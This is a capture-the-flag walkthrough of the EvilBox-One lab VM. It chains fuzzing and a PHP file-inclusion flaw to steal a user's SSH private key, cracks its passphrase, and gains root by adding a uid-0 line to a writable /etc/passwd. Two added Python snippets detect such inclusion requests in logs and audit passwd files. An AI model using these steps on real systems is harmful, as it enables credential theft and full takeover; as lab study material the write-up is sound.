- Target machine: https://download.vulnhub.com/evilbox/EvilBox---One.ova
- MD5 checksum: c3a65197b891713731e6bb791d7ad259
- Verification commands:
  - cmd: certutil -hashfile file_path MD5
  - powershell: Get-FileHash file_path -Algorithm MD5 | Format-List
- VirtualBox required
- Network configuration: Host-Only
- Network setup guide: https://www.cnblogs.com/shadow-/p/16815020.html
Target Analysis
Discovery Phase
Use standard discovery tools:
- arp-scan
- nmap
- netdiscover
- fping
Initial scanning with sudo arp-scan -l -I eth1 showed limitations compared to other tools. Nmap is more suitable for targeted scanning once the host has been identified.
Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:15:0f:e5 PCS Systemtechnik GmbH
192.168.56.117 08:00:27:4d:bc:dd PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.140 seconds (119.63 hosts/sec). 3 responded
Analysis:
- 192.168.56.1 and 192.168.56.100 are the gateway and DHCP server addresses
- Target is 192.168.56.117
Perform a standard nmap scan: nmap -A -T4 192.168.56.117
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 09:41 CST
Nmap scan report for 192.168.56.117
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 4495500be473a18511ca10ec1ccbd426 (RSA)
| 256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_ 256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds
Findings:
- Port 22: OpenSSH 7.9p1
- Port 80: Apache 2.4.38
- OS: Linux Debian
- SSH not viable without credentials or keys
- Focus on port 80 for potential vulnerabilities
Web Application Analysis
Initial exploration with Firefox revealed only the default Apache2 Debian page with no useful information.
Use web crawling tools to discover hidden directories:
- dirsearch
- dirb
- dirbuster
- gobuster
- feroxbuster
- ffuf
- wfuzz
Execute with dirsearch --url='192.168.56.117:80/'
┌──(kali㉿kali)-[~]
└─$ dirsearch --url='192.168.56.117:80/'
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/80-_22-11-09_09-52-49.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-11-09_09-52-49.log
Target: http://192.168.56.117:80/
[09:52:49] Starting:
[09:52:52] 403 - 279B - /.ht_wsr.txt
[09:52:52] 403 - 279B - /.htaccess.bak1
[09:52:52] 403 - 279B - /.htaccess.sample
[09:52:52] 403 - 279B - /.htaccess.save
[09:52:52] 403 - 279B - /.htaccess_extra
[09:52:52] 403 - 279B - /.htaccess_orig
[09:52:52] 403 - 279B - /.htaccess_sc
[09:52:52] 403 - 279B - /.htaccess.orig
[09:52:52] 403 - 279B - /.htaccessOLD
[09:52:52] 403 - 279B - /.htaccessOLD2
[09:52:52] 403 - 279B - /.htpasswds
[09:52:52] 403 - 279B - /.html
[09:52:52] 403 - 279B - /.htm
[09:52:52] 403 - 279B - /.htpasswd_test
[09:52:52] 403 - 279B - /.httr-oauth
[09:52:52] 403 - 279B - /.htaccessBAK
[09:54:23] 200 - 12B - /robots.txt
[09:54:25] 200 - 4B - /secret/
[09:54:25] 301 - 317B - /secret -> http://192.168.56.117/secret/
[09:54:25] 403 - 279B - /server-status
[09:54:25] 403 - 279B - /server-status/
[09:53:51] 200 - 10KB - /index.html
Key findings:
- /index.html: Default Apache page
- /robots.txt: Contains "Hello H4x0r" (potential password clue)
- /secret: Directory requiring further investigation
Examine robots.txt content:
The message "Hello H4x0r" appears to be a taunt aimed at attackers. "H4x0r" is leetspeak for "hacker", and the string may be related to credentials.
Scan the /secret directory with dirsearch --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -e txt,php,html,jsp
Alternatively, use gobuster for better performance:
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.117:80/secret
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,html,jsp
[+] Timeout: 10s
===============================================================
2022/11/09 19:35:29 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 4]
/evil.php (Status: 200) [Size: 0]
Progress: 708415 / 708545 (99.98%)
===============================================================
2022/11/09 19:42:23 Finished
===============================================================
Key finding: /evil.php returns no visible content, suggesting it may process parameters.
Parameter Fuzzing
Use ffuf for parameter fuzzing:
- Parameter dictionary: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
- Value dictionary: var.txt (containing potential payloads)
Build var.txt with potential payloads:
0
1
a
'
"
(
[
{
<
,
;
?
`
/
\
%
ture
false
../robots.txt
H4x0r
Execute ffuf command:
┌──(kali㉿kali)-[~/workspace]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.56.117/secret/evil.php?params=var
:: Wordlist : params: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Wordlist : var: ./var.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________
[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 50ms]
* params: command
* var: ../robots.txt
:: Progress: [109701/109701] :: Job [1/1] :: 1599 req/sec :: Duration: [0:02:00] :: Errors: 0 ::
Results:
- Parameter name: command
- Payload: ../robots.txt (indicating a file inclusion vulnerability)
Test file inclusion with http://192.168.56.117/secret/evil.php?command=../robots.txt. The response matches the robots.txt content, confirming a local file inclusion vulnerability.
File Inclusion Exploitation
Test for remote file inclusion:
┌──(kali㉿kali)-[~/workspace]
└─$ ls
var.txt
┌──(kali㉿kali)-[~/workspace]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
-- horizontal split --
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.56.117/secret/evil.php?command=http://192.168.56.116:80/var.txt"
Remote file inclusion is not supported.
Test PHP wrapper protocols:
┌──(kali㉿kali)-[~/workspace]
└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"
SGVsbG8gSDR4MGIK
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" | base64 --decode
% Total % Received % Xferd Average Speed Time Time Time Total Spent Left Speed
100 92 100 92 0 0 8532 0 --:--:-- --:--:-- --:--:-- 9200
<?php $filename = $_GET['command'];
include($filename);
?>
The php://filter wrapper lets us read file contents (including PHP source) but provides no write primitive. The evil.php source confirms a plain include() of the unfiltered command parameter, i.e. a simple file inclusion vulnerability.
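From the defender's side, the requests made above leave a recognisable trail in the Apache access log. The following added example (not part of the original walkthrough) is a small Python detector that flags traversal sequences, php:// wrappers, remote URLs and sensitive absolute paths in query-string values; the log lines it runs on are constructed to mirror the requests issued here.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines modelled on the requests in this walkthrough
# (the response sizes and user agents are made up for the example).
SAMPLE_LOG = """\
192.168.56.116 - - [09/Nov/2022:09:52:49 -0600] "GET /robots.txt HTTP/1.1" 200 12 "-" "curl/7.85.0"
192.168.56.116 - - [09/Nov/2022:10:01:03 -0600] "GET /secret/evil.php?command=../robots.txt HTTP/1.1" 200 12 "-" "Fuzz Faster U Fool v1.5.0"
192.168.56.116 - - [09/Nov/2022:10:05:17 -0600] "GET /secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt HTTP/1.1" 200 16 "-" "curl/7.85.0"
192.168.56.116 - - [09/Nov/2022:10:09:40 -0600] "GET /secret/evil.php?command=/home/mowree/.ssh/id_rsa HTTP/1.1" 200 1766 "-" "curl/7.85.0"
192.168.56.116 - - [09/Nov/2022:10:12:02 -0600] "GET /secret/evil.php?command=http://192.168.56.116:80/var.txt HTTP/1.1" 200 0 "-" "curl/7.85.0"
192.168.56.116 - - [09/Nov/2022:10:15:55 -0600] "GET /secret/evil.php?command=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1380 "-" "curl/7.85.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip|glob|compress\.\w+)://', re.I)
REMOTE_RE = re.compile(r'^(https?|ftps?)://', re.I)
SENSITIVE_PREFIXES = ('/etc/', '/home/', '/root/', '/proc/', '/var/log/')

def classify_value(value):
    """Return the reasons one query-string value looks like a file-inclusion attempt."""
    # Decode twice so double-encoded traversal (%252e%252e%252f) is caught as well.
    decoded = unquote(unquote(value))
    reasons = []
    if re.search(r'\.\.[/\\]', decoded):
        reasons.append('path traversal')
    if WRAPPER_RE.match(decoded):
        reasons.append('php wrapper')
    if REMOTE_RE.match(decoded):
        reasons.append('remote include')
    if decoded.startswith(SENSITIVE_PREFIXES) or '.ssh/' in decoded:
        reasons.append('sensitive path')
    return reasons

def scan_log(text):
    """Parse access-log lines and return one finding per suspicious parameter value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, status, size = m.groups()
        url = urlsplit(target)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({'ip': ip, 'path': url.path, 'param': name, 'value': value,
                                 'status': int(status), 'reasons': reasons})
    return findings
```

Feeding a real access log through scan_log() surfaces the whole sequence from the first ../ probe to the id_rsa read, and the 200 status on those entries is what distinguishes a successful inclusion from noise.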
Sensitive File Enumeration
Create a dictionary of sensitive system files (file.txt) for enumeration.
Execute enumeration script:
# Request every path listed in file.txt through the vulnerable include and print each response
for i in $(cat ./file.txt)
do
echo ">>>$i:"
curl "http://192.168.56.117/secret/evil.php?command=$i"
done
Key findings from enumeration:
- /etc/passwd: Reveals a user named "mowree"
- /etc/ssh/sshd_config: Default SSH configuration
- /etc/ssh/ssh_host_rsa_key.pub: SSH host public key
SSH Key Discovery
Create a dictionary of SSH-related files (ssh_dict.txt) for enumeration.
Execute SSH enumeration script:
# Same loop as above, this time over the SSH-related paths in ssh_dict.txt
for i in $(cat ./ssh_dict.txt);
do
echo "输出 >>>$i:";
curl "http://192.168.56.117/secret/evil.php?command=$i";
done
Key findings:
- /home/mowree/.ssh/authorized_keys: Contains an RSA public key
- /home/mowree/.ssh/id_rsa: Contains an encrypted RSA private key
SSH Credential Theft
Download the private key:
touch id_rsa && curl "http://192.168.56.117/secret/evil.php?command=/home/mowree/.ssh/id_rsa" > id_rsa && chmod 600 id_rsa
Attempt SSH login with the stolen key:
┌──(kali㉿kali)-[~/workspace]
└─$ ssh mowree@192.168.56.117 -i id_rsa
The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Enter passphrase for key 'id_rsa':
The key is passphrase protected. Use John the Ripper to crack it:
┌──(kali㉿kali)-[~/workspace]
└─$ /usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa
┌──(kali㉿kali)-[~/workspace]
└─$ john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (./id_rsa)
1g 0:00:00:00 DONE (2022-11-10 19:22) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The passphrase is "unicorn". Now attempt SSH login:
┌──(kali㉿kali)-[~/workspace]
└─$ ssh mowree@192.168.56.117 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Privilege Escalation
Find user.txt flag:
mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
Check for privilege escalation vectors:
- Sudo permissions: None found
- Kernel exploits: Not viable
- Writable files: /etc/passwd has write permissions
Exploit the writable /etc/passwd to create a new root user with password "123":
root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash
Switch to root:
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree# id
uid=0(root) gid=0(root) grupos=0(root)
Obtain root flag:
root@EvilBoxOne:/home/mowree# cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
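The writable /etc/passwd and the second uid-0 entry are both easy to audit for. This added example (not from the original walkthrough) parses passwd-format text together with the file's mode bits and reports group/world-writability, duplicate usernames, password hashes stored outside /etc/shadow and any uid-0 account other than root; the sample content is constructed and includes the line injected above.

```python
import os
import stat

# Constructed /etc/passwd content: the standard root entry, a service account, the
# mowree user from this box and the extra uid-0 line added in the walkthrough above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash
"""

def audit_passwd(text, mode=0o644):
    """Return findings for passwd-format text plus the file's permission bits (st_mode)."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f'file is writable by group or others (mode {stat.S_IMODE(mode):04o})')
    uid0, seen = [], {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7:
            findings.append(f'line {lineno}: malformed entry ({len(fields)} fields)')
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if name in seen:
            findings.append(f'line {lineno}: duplicate username {name!r} (first seen on line {seen[name]})')
        seen.setdefault(name, lineno)
        # A real hash (or an empty field) here bypasses /etc/shadow entirely.
        if pw not in ('x', '*') and not pw.startswith('!'):
            kind = 'an empty password' if pw == '' else 'a password hash'
            findings.append(f'line {lineno}: {name!r} has {kind} in the passwd field')
        if uid == '0':
            uid0.append((lineno, name))
    if len(uid0) != 1 or uid0[0][1] != 'root':
        findings.append('uid 0 accounts: ' + ', '.join(f'{n} (line {l})' for l, n in uid0))
    return findings

def audit_file(path='/etc/passwd'):
    """Audit a passwd file on disk using its real permission bits."""
    with open(path) as fh:
        return audit_passwd(fh.read(), os.stat(path).st_mode)
```

Running audit_file() on the box before the escalation would already report the writable mode; afterwards it also reports the duplicate root entry and the hash that bypasses /etc/shadow.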